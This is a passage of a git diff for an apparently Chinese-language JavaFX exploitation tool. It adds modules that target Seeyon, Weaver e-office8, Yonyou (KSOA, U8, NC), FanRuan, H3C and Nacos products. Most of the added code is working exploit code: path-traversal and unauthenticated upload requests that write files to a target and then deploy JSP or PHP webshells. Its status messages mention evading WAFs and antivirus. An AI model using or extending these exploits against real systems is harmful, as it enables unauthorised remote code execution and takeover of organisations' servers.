+ Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/seeyonreport/WebReport/nishidazhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+}
diff --git a/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java b/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
new file mode 100644
index 0000000..9556aff
--- /dev/null
+++ b/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
@@ -0,0 +1,107 @@
+package exp.oa.weaveroa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class weaveroa_eoffice8_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ Boolean pay1 = pay1(url, textArea);
+ return pay1;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Boolean shell = shell(url, textArea);
+ return shell;
+ }
+
+ private Boolean pay1(String url, TextArea textArea) {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+ String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhu.php4\"\n" +
+ "Content-Type: application/octet-stream\n" +
+ "\n" +
+ shell.readFile(shell.Testpath) + "\n" +
+ "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+ Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+
+ try {
+ String uri1 = post.getText().split("\\*")[0];
+ String uri2 = post.getText().split("\\*")[1];
+
+
+ String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+ Response response = HttpTools.get(geturl, new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 测试文件写入成功 \n " + geturl
+ );
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+
+
+ }
+
+ private Boolean shell(String url, TextArea textArea) {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+ String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhuda.php4\"\n" +
+ "Content-Type: application/octet-stream\n" +
+ "\n" +
+ shell.readFile(shell.Phppath) + "\n" +
+ "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+ Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+ String uri1 = post.getText().split("\\*")[0];
+ String uri2 = post.getText().split("\\*")[1];
+
+ String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+ Response response = HttpTools.get(geturl, new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 shell文件写入成功 \n " + geturl
+ );
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 疑似waf查杀,请手动测试"
+ );
+ });
+ return false;
+ }
+ }
+
+
+}
diff --git a/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java b/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
new file mode 100644
index 0000000..3ce45d8
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
@@ -0,0 +1,60 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+
+public class yongyou_KSOA_Attachmentupload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Disposition","application/x-msdownload; ");
+ Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.txt", shell.test_payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/pictures/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(()->{
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/nishizhu.txt");
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n yongyou_KSOA_Attachmentupload-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=---------------------------122739796041499160471980406311");
+ Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.jsp", shell.readFile(shell.Jsppath), head, "utf-8");
+ Response response = HttpTools.get(url + "/pictures/nishizhu.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(()->{
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n" + url + "/nishizhu.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n waf拦截!!!请手动复现!!!");
+ });
+ return false;
+ }
+ }
+
+}
diff --git a/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java b/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
new file mode 100644
index 0000000..2eb81f7
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
@@ -0,0 +1,87 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class yongyou_U8_AppProxy implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url,textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url,textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+ String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+ "Content-Type: image/png\n" +
+ "\n" +
+ "<% out.println(\"" + shell.test_payload + "\");%>\n" +
+ "--59229605f98b8cf290a7b8908b34616b--";
+
+ Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap(), "utf-8");
+
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在,测试文件写入成功 " + url + "/hello_U8.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n yongyou_U8_AppProxy-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+ );
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+ String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+ "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+ "Content-Type: image/png\n" +
+ "\n" +
+ "<% out.println(\"" + shell.readFile(shell.Jsppath) + "\");%>\n" +
+ "--59229605f98b8cf290a7b8908b34616b--";
+
+ Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap(), "utf-8");
+
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在,webshell文件写入成功 " + url + "/hello_U8.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(()->{
+ textArea.appendText("\n waf拦截!!!请手动复现!!!");
+ });
+ return false;
+ }
+ }
+
+
+
+}
diff --git a/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java b/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
index d1a6813..caf912f 100644
--- a/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
@@ -35,7 +35,7 @@ public class yongyou_chajet_upload implements Exploitlnterface {
Response post = HttpTools.post(url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1", fir_post, this.headers, "utf-8");
if (post.getCode() == 200) {
Response response = HttpTools.get(url + "/tplus/SM/SetupAccount/images/" + filename, new HashMap(), "utf-8");
- if (response.getText().contains(shell.test_payload)) {
+ if (response.getText() != "" && response.getText().contains(shell.test_payload)) {
Platform.runLater(() -> {
textArea.appendText("\n 漏洞存在,测试文件写入成功 \n地址为:" + url + "/tplus/SM/SetupAccount/images/" + filename);
});
diff --git a/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java b/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
new file mode 100644
index 0000000..2ad052b
--- /dev/null
+++ b/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
@@ -0,0 +1,122 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class yongyou_nc_uploadServlet implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea) {
+ try {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data;");
+ HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+ coon.setRequestMethod("POST");
+ coon.setDoOutput(true);
+ coon.setDoInput(true);
+ coon.setUseCaches(false);
+
+ for (String key : head.keySet()) {
+ coon.setRequestProperty(key, head.get(key));
+ }
+ OutputStream outputStream = coon.getOutputStream();
+ ObjectOutputStream out = new ObjectOutputStream(outputStream);
+ Map metaInfo = new HashMap();
+ metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+ metaInfo.put("FILE_NAME", "nishizhu.txt");
+ out.writeObject(metaInfo);
+ outputStream.write(shell.test_payload.getBytes());
+ out.flush();
+ out.close();
+ outputStream.close();
+ HttpTools.getResponse(coon, "utf-8");
+
+ Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap(), "utf-8");
+ if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+ textArea.appendText("\n 连接异常!!!");
+ });
+ }
+ return false;
+ }
+
+ private Boolean shell(String url, TextArea textArea) {
+
+ try {
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "multipart/form-data;");
+ HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+ coon.setRequestMethod("POST");
+ coon.setDoOutput(true);
+ coon.setDoInput(true);
+ coon.setUseCaches(false);
+
+ for (String key : head.keySet()) {
+ coon.setRequestProperty(key, head.get(key));
+ }
+ OutputStream outputStream = coon.getOutputStream();
+ ObjectOutputStream out = new ObjectOutputStream(outputStream);
+ Map metaInfo = new HashMap();
+ metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+ metaInfo.put("FILE_NAME", "nishizhu.jsp");
+ out.writeObject(metaInfo);
+ outputStream.write(shell.readFile(shell.Jsppath).getBytes());
+ out.flush();
+ out.close();
+ outputStream.close();
+ HttpTools.getResponse(coon, "utf-8");
+
+ Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<>(), "utf-8");
+ if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
+ });
+ return true;
+ } else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n shell被查杀 请免杀!!!!!!!!");
+ });
+ return false;
+ }
+
+ } catch (Exception e) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 连接异常!!!");
+ });
+ }
+ return false;
+ }
+
+}
diff --git a/src/main/java/utils/Kinds_Exp.java b/src/main/java/utils/Kinds_Exp.java
index 5706770..c41bfce 100644
--- a/src/main/java/utils/Kinds_Exp.java
+++ b/src/main/java/utils/Kinds_Exp.java
@@ -1,17 +1,18 @@
package utils;
import core.Exploitlnterface;
+import exp.cms.nacos_Creatuser;
+import exp.equipment.h3c.cas_cvm_upload;
import exp.equipment.hikvision.hik_applyCT_fastjson;
import exp.equipment.qianxin.ngfw_waf_router;
import exp.equipment.wangyu.Leadsec_ACM_account;
import exp.middleware.iis.iis_put_rce;
+import exp.oa.fanruan.fanruan_save_svg;
import exp.oa.landrayoa.landray_datajson;
+import exp.oa.landrayoa.landray_fileupload_sysSearch;
import exp.oa.landrayoa.landray_sysSearchMain;
import exp.oa.landrayoa.landray_treexmlTmpl;
-import exp.oa.seeyonoa.seeyonoa_ajaxBypass;
-import exp.oa.seeyonoa.seeyonoa_htmlofficeservlet;
-import exp.oa.seeyonoa.seeyonoa_main_log4j2;
-import exp.oa.seeyonoa.seeyonoa_wpsAssistServlet;
+import exp.oa.seeyonoa.*;
import exp.oa.tongdaoa.tongdaoa_apiali;
import exp.oa.tongdaoa.tongdaoa_getdata;
import exp.oa.wanhuoa.wanhu_DocumentEdit;
@@ -19,15 +20,7 @@ import exp.oa.wanhuoa.wanhuoa_OfficeServer;
import exp.oa.wanhuoa.wanhuoa_Officeserverservlet;
import exp.oa.wanhuoa.wanhuoa_fileUploadController;
import exp.oa.wanhuoa.wanhuoa_smartUpload;
-import exp.oa.weaveroa.weaveroa_BshServlet;
-import exp.oa.weaveroa.weaveroa_KtreeUploadAction;
-import exp.oa.weaveroa.weaveroa_WorkflowServiceXml;
-import exp.oa.weaveroa.weaveroa_doExecl;
-import exp.oa.weaveroa.weaveroa_eoffice10_OfficeServer;
-import exp.oa.weaveroa.weaveroa_mobile6_sqlli;
-import exp.oa.weaveroa.weaveroa_office_UploadFile;
-import exp.oa.weaveroa.weaveroa_page_uploadOperation;
-import exp.oa.weaveroa.weaveroa_workrelate_uploadOperation;
+import exp.oa.weaveroa.*;
import exp.oa.yongyou.*;
import java.util.ArrayList;
@@ -70,6 +63,7 @@ public class Kinds_Exp {
kindList.add("OA");
kindList.add("安全设备");
kindList.add("中间件");
+ kindList.add("CMS");
return kindList;
}
@@ -82,6 +76,7 @@ public class Kinds_Exp {
oa.add("万户-OA");
oa.add("致远-OA");
oa.add("通达-OA");
+ oa.add("帆软-OA");
return FXCollections.observableArrayList(oa);
}
@@ -96,12 +91,19 @@ public class Kinds_Exp {
public static ObservableList equipment() {
ArrayList equipment = new ArrayList<>();
equipment.add("海康");
+ equipment.add("H3C");
equipment.add("深信服");
equipment.add("网御星云");
equipment.add("奇安信");
return FXCollections.observableArrayList(equipment);
}
+ public static ObservableList cms() {
+ ArrayList equipment = new ArrayList<>();
+ equipment.add("Alibaba");
+ return FXCollections.observableArrayList(equipment);
+ }
+
/*---------------------OA系列-------------------------*/
//泛微oa
@@ -114,6 +116,7 @@ public class Kinds_Exp {
expList.add("e-cology BshServlet-RCE");
expList.add("e-cology KreeUploadAction-RCE");
expList.add("e-office logo_UploadFile.php-RCE");
+ expList.add("e-office8 upload.php-RCE");
expList.add("e-office10 OfficeServer.php-RCE");
expList.add("e-office doexcel.php-RCE");
expList.add("e-mobile_6.6 messageType.do-SQlli");
@@ -127,6 +130,14 @@ public class Kinds_Exp {
expList.add("landray_sysSearchMain.do-RCE");
expList.add("landray_treexmlTmpl-RCE");
expList.add("landray_datajson-RCE");
+ expList.add("landray_fileupload_sysSearch-RCE");
+ return FXCollections.observableArrayList(expList);
+ }
+
+ public ObservableList fanruan(){
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("fanruan-design_save_svg-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -138,8 +149,11 @@ public class Kinds_Exp {
expList.add("NC_bsh.servlet.BshServlet-RCE");
expList.add("NC_NCFindWeb-Directory");
expList.add("NC_FileReceiveServlet-RCE");
+ expList.add("NC_UploadServlet-RCE");
expList.add("GRP_U8_UploadFileData-RCE");
+ expList.add("GRP_U8_AppProxy-RCE");
expList.add("KSOA_ImageUpload-RCE");
+ expList.add("KSOA_Attachmentupload-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -160,9 +174,11 @@ public class Kinds_Exp {
expList = new ArrayList<>();
expList.add("All");
expList.add("seeyonoa_main_log4j2-RCE");
+ expList.add("seeyonoa_seeyonreport_upload-RCE");
expList.add("seeyonoa_wpsAssisServlet-RCE");
expList.add("seeyonoa_htmlofficeservlet-RCE");
expList.add("seeyonoa_ajaxBypass-RCE");
+ expList.add("seeyon_testsqli-RCE");
return FXCollections.observableArrayList(expList);
}
@@ -196,6 +212,13 @@ public class Kinds_Exp {
return FXCollections.observableArrayList(expList);
}
+ public ObservableList h3c() {
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("cas_cvm云计算管理平台-RCE");
+ return FXCollections.observableArrayList(expList);
+ }
+
//奇安信
public ObservableList qianxin() {
expList = new ArrayList<>();
@@ -211,6 +234,15 @@ public class Kinds_Exp {
return FXCollections.observableArrayList(expList);
}
+ /*---------------------CMS-------------------------*/
+
+ public ObservableList Alibaba() {
+ expList = new ArrayList<>();
+ expList.add("All");
+ expList.add("nacos任意用户添加");
+ return FXCollections.observableArrayList(expList);
+ }
+
public ObservableList defaultList() {
expList = new ArrayList<>();
expList.add("All");
@@ -242,6 +274,15 @@ public class Kinds_Exp {
}else if(vulName.contains("e-office doexcel.php-RCE")){
ei = new weaveroa_doExecl();
}
+ else if(vulName.contains("e-office8 upload.php-RCE")){
+ ei = new weaveroa_eoffice8_upload();
+ }
+
+
+ else if (vulName.contains("fanruan-design_save_svg-RCE")) {
+ //帆软
+ ei = new fanruan_save_svg();
+ }
else if (vulName.contains("chajet_upload-RCE")) {
//用友
@@ -256,15 +297,22 @@ public class Kinds_Exp {
ei = new yongyou_grp_UploadFileData();
}else if(vulName.contains("KSOA_ImageUpload-RCE")){
ei = new yongyou_KSOA_imageupload();
- }
+ }else if(vulName.contains("NC_UploadServlet-RCE")){
+ ei = new yongyou_nc_uploadServlet();
+ } else if (vulName.contains("GRP_U8_AppProxy-RCE")) {
+ ei = new yongyou_U8_AppProxy();
+ } else if (vulName.contains("KSOA_Attachmentupload-RCE")) {
+ ei = new yongyou_KSOA_Attachmentupload();
- else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
+ } else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
//蓝凌
ei = new landray_sysSearchMain();
} else if (vulName.contains("landray_treexmlTmpl-RCE")) {
ei = new landray_treexmlTmpl();
} else if (vulName.contains("landray_datajson-RCE")) {
ei = new landray_datajson();
+ } else if (vulName.contains("landray_fileupload_sysSearch-RCE")) {
+ ei = new landray_fileupload_sysSearch();
}
else if(vulName.contains("wanhu_OfficeServer-RCE")){
@@ -289,6 +337,10 @@ public class Kinds_Exp {
ei = new seeyonoa_htmlofficeservlet();
}else if(vulName.contains("seeyonoa_ajaxBypass-RCE")){
ei = new seeyonoa_ajaxBypass();
+ }else if(vulName.contains("seeyonoa_seeyonreport_upload-RCE")){
+ ei = new seeyonreport_svg_upload();
+ }else if (vulName.contains("seeyon_testsqli-RCE")) {
+ ei = new seeyon_testsqli();
}
else if(vulName.contains("tongdaoa_getdata-RCE")){
@@ -315,7 +367,16 @@ public class Kinds_Exp {
else if(vulName.contains("上网行为管理账号密码泄露_Leadsec_ACM")){
//网御星云
ei = new Leadsec_ACM_account();
+ } else if (vulName.contains("cas_cvm云计算管理平台-RCE")) {
+ //h3c
+ ei = new cas_cvm_upload();
}
+
+ /*-----CMS-----*/
+ else if (vulName.contains("nacos任意用户添加")) {
+ ei = new nacos_Creatuser();
+ }
+
return ei;
}
}
diff --git a/src/main/java/utils/shell.java b/src/main/java/utils/shell.java
index b023eb2..991bd0c 100644
--- a/src/main/java/utils/shell.java
+++ b/src/main/java/utils/shell.java
@@ -42,6 +42,11 @@ public class shell {
// public static String dnspath = "./Apt_config/dnslog/dnslog.txt";
+
+// public static final String open = "notepad ";
+ public static final String open = "open ";
+
+
//标记内容
public static final String test_payload = "9df37afc77bdd582d90aefaf4e35c63e";
@@ -179,4 +184,26 @@ public class shell {
}
return sb.toString();
}
+
+
+
+ /*-------------------------------url编码方法---------------------------*/
+
+ public static String gbEncoding(String gbString) {
+ char[] utfBytes = gbString.toCharArray();
+ String unicodeBytes = "";
+
+ for(int i = 0; i < utfBytes.length; ++i) {
+ String hexB = Integer.toHexString(utfBytes[i]);
+ if (hexB.length() <= 2) {
+ hexB = "00" + hexB;
+ }
+
+ unicodeBytes = unicodeBytes + "\\u" + hexB;
+ }
+
+ return unicodeBytes;
+ }
+
+
}
+ 
+